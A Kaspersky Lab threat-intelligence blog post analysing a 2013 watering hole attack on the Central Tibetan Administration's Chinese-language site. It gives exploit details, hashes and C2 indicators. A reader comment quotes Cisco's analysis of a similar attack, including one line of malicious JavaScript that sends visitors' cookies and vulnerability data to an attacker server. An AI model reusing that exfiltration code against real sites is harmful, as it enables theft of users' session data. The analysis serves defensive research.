English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Central Tibetan Administration Website Strategically Compromised as Part of Watering Hole Attack

Kurt Baumgartner
Kaspersky Lab Expert
Posted August 12, 16:47  GMT
Tags: Website Hacks, Sun Java, Targeted Attacks, Microsoft, Vulnerabilities and exploits
0.6
 

A snippet of code on the Central Tibetan Administration website redirects CN speaking visitors to a Java exploit that drops an APT-related backdoor. For some context, the site claims the administration itself as "...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet." The selection of placement for the malicious code is fairly extraordinary, so let's dive in.

The attack itself is precisely targeted, as an appended, embedded iframe redirects "xizang-zhiye(dot)org" visitors (this is the CN-translated version of the site) to a java exploit that maintains a backdoor payload. The english and Tibetan versions of the website do not maintain this embedded iframe on the Chinese version (please do not visit at this time). At this point in time, it seems that the few systems attacked with this code are located in China and the US, although there could be more. The Java exploit being delivered is the 212kb "YPVo.jar" (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well. That file is a 397 kb win32 executable "aMCBlHPl.exe" (a6d7edc77e745a91b1fc6be985994c6a) detected as "Trojan.Win32.Swisyn.cyxf". Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is.

The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but it was used by the actor distributing the original CVE-2012-4681 0day Gondzz.class and Gondvv.class in August of last year. You can see the 4681 exploit code in the image above along with code setting the jvm SecurityManager to null to disable Java's policy checks and then running the Payload.main method. The Payload.main Follow me on Twitter method contains some interesting but simple capabilities that enable an attacker to download the payload over https and AES decrypt it using Java's built-in AES crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the jar file's win32 exe resource. The backdoor itself is detected by most of the AV crowd as variants of gaming password stealers, which is flatly incorrect. The related C2 is located at news.worldlinking.com (59.188.239.46).

This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back to at least a busy late 2011 season. We also show Apple related Java exploits from this server targeting the more recent CVE-2013-2423.

UPDATE 2013.08.13: The CN version of the site at "xizang-zhiye(dot)org" appears to be cleaned up and has not been serving any malicious code that I can find over the past day. The administrators appear to have cleaned everything up on early Tuesday their time/later Monday "western" time and there are no indications of any return since. We will continue to monitor the site for signs of compromise.


2 comments

Oldest first
Threaded view
 

Prashant Kate

2013 Sep 19, 20:04
0
 

Watering Hole Attacks an Attractive Alternative to Spear Phishing

Watering Hole” attacks, as evidenced by the recent attack involving the U.S. Department of Labor, are becoming increasingly popular as alternatives to attacks such as Spear Phishing. In a “Watering Hole” attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. Eventually, someone from the targeted group visits the “trusted” site (A.K.A. the “Watering Hole”) and becomes compromised.

A malicious site which was recently linked with the Department of Labor attack. According to the evidence we have, the sites www.kforce.com and www.sbc.net were among those compromised during this attack. The webpages that were serving malicious content from these sites were mostly job-search related, but several requests to www.sellagreement.com lacked a “Referrer:” HTTP header entirely.

Technical Details
The Department of Labor and related attacks happened in a few stages. First, a victim visits one of the compromised sites, such a www.sbc.net. This compromised site loads malicious content whose purpose is to scan the victim machine for Anti-Virus software and exploitable software vulnerabilities. After the data collection is complete, the victim machine phones home its configuration data. If the system is found to be running a vulnerable piece of software, an exploit is delivered.

JavaScript files used as part of the reconnaissance portion of the attack. Inside the JavaScript are lists and file system paths of various software programs such as Acrobat, MS Office, Bitdefender, Sophos, Trend, Java and more.

js_1

Malicious JavaScript, as recorded by jeek.org

The JavaScript attempts to instantiate objects of various types (Flash, Java) looking for vulnerabilities. The vulnerabilities found are then phoned home back to the www.sellagreement.com server along with cookies and other software version information. The JavaScript source provides clues to the structure of phone home data that is included in the path of the GET request made to the www.sellagreement.com site.

jsme.src = url+’?'+Math.random()+’ vul=’+data+’ ck=’+escape(document.cookie)+’ flashver=’+ver; page.appendChild(jsme);

After the reconnaissance portion of the attack took place, a request to a site hosting the exploit for CVE-2013-1347 occurred, the victim would then be redirected to a site hosting a base64-encoded version of an exploit for the vulnerability. Once decoded, the base64-encoded string shows the function calls used to exploit the vulnerability.

js_2

Base 64 Function Call

js_3
Decoded Exploit Code vs. Metasploit Code

The Metasploit source code appears to be an exact copy of the sample used in the Department of Labor attack. This is probably simply a case of a Metasploit developer appropriating public code to speed the development process and not an indication of a connection with the attackers.

Note: the payloads are completely different; the Metasploit payloads are not persistent or malicious.

Because this Internet Explorer 8 (IE8) vulnerability is now publicly available in Metasploit, Cisco expects additional similar attacks to occur. As always, keep your browser up-to-date with the latest security patches, and in this case, consider using a web browser other than IE 8.

Reply    

Kurt Baumgartner

2013 Oct 24, 21:20
0
 

Re: Watering Hole Attacks an Attractive Alternative to Spear Phishing

Thanks for the interesting text from the Cisco blog, Prashant. Yes, you might notice in some of our other reports, like the TeamSpy report earlier this year, that in addition to spear-phishing, these targeted threat actors have been using watering holes for years now. And, the server side attacks they have been doing are even less publicly reported on than the watering hole stuff. They are all parts of their toolsets.

Reply    
If you would like to comment on this article you must first
login


Bookmark and Share
Share

Related Links

Analysis

Blog